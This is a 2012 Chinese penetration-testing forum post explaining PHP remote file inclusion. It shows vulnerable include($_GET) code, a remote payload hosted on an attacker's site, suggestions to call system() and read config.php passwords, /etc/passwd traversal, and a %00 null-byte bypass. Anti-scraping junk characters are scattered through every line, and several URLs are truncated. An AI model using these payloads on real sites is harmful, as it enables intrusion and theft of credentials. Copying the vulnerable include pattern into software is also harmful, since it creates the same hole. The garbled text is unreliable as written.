中国网络渗透测试联盟

标题: PHP远程包含 [打印本页]
作者: admin    时间: 2012-9-15 14:06
标题: PHP远程包含

! @7 e2 O5 u3 S6 A3 @9 v; y8 `5 K; _php远端档包含漏洞基本
9 x& L$ Z1 @$ Y/ w0 G这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。
3 C. `1 R& ?& b( _7 f' ?* ~本帖隐藏的内容需要回复才可以浏览6 w9 I2 j% v* f9 z7 R0 @
首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。. P3 O/ k! H) p( \
1.找出bug:
  D. F! E/ A* Z% Z$ [  |为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
* {) }, O( y  K! B& f8 J) ~8 U如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。
0 y; a7 c; v& h- H5 d我们先看这个,当用户输入通过后就包含档,也就是
% J# H! ?  c4 H- Gif ($_GET) {
. N5 l- K! U0 |6 S1 q& W: {+ N- c% Cinclude $_GET;
  K" \1 X) ^. G+ M1 U$ z} else {
$ m% z+ h$ N% }) k! B; o' |include "home.php";% K* N+ T$ s+ h5 Y) Y: X$ m; u
}8 I$ E' P/ F$ j
这种结构在动态网站里是常见的,问题是它允许这样http://www.target.com /explame.php?page=main.php或者http://www.target.com/explame.php? page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。, \6 E. E; a) S; f7 e! q
2.测试
" Y" C6 g) c) A0 X这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的' H: ~" Y8 d, d
http://www.target.com/explame.php?page=zizzy
# C% u$ @+ n2 Q! L- F7 P% ^+ BWarning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3; b& q% y. |8 T# a
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 38 w! l4 i( X: h- b2 `* Q% r
php输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。2 F3 L0 P& ~/ q1 q1 H7 k! t' k
3.利用
* }. l& T  P" J8 |# _+ I% Sphp确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样
8 i; r! y1 D4 ]1 C9 A6 P" g) l<?; I8 K: E) q/ S9 n! W# S; a5 R
echo "Wow,test!";
4 C2 O! }( f8 |( C& C?>
/ ?/ J/ B2 g0 Y7 H. G那么http://www.target.com/explame.php?pa...e.com/yeah.txt
) N3 }7 P- u  H+ EOK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。- V& k$ o9 G: T3 M7 N0 r! V5 c
4.另一种) I/ c, E: O, `) S, n
有时程式师换种写法,写成这样,限制了包含范围' G9 M, T0 P0 U6 u4 l1 m1 O5 t5 l
if ($_GET) {
+ ?0 f' L& q( W! k- \include "$_GET.php";6 q7 n8 l, U* h% L
} else {
4 b+ T# f# r" o, j3 k: _  n4 ^: qinclude "home.php";
1 G& c( d+ Z; v}
- Y4 a9 D- U. @& j2 o我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt; U/ d) g% M  q$ X% e  j
Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 35 F+ c' G! n# m
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3+ j7 d& N2 U) y$ v$ S# L/ i
包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
- u  z8 s# a( ]0 c( R那passwd怎么办
! [$ Q6 ]  T) W3 a/ U; ZWarning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
  Y0 m5 G# u2 d5 t1 SWarning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
; H3 H" a! n& D. w! J在这里使用个NUL字元,也就是%00来跳过检测
6 d; P, i+ U0 }: O& c& Chttp://www.target.com/explame.php?pa.../etc/passwd%00
0 E) b( ^6 N. Z



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2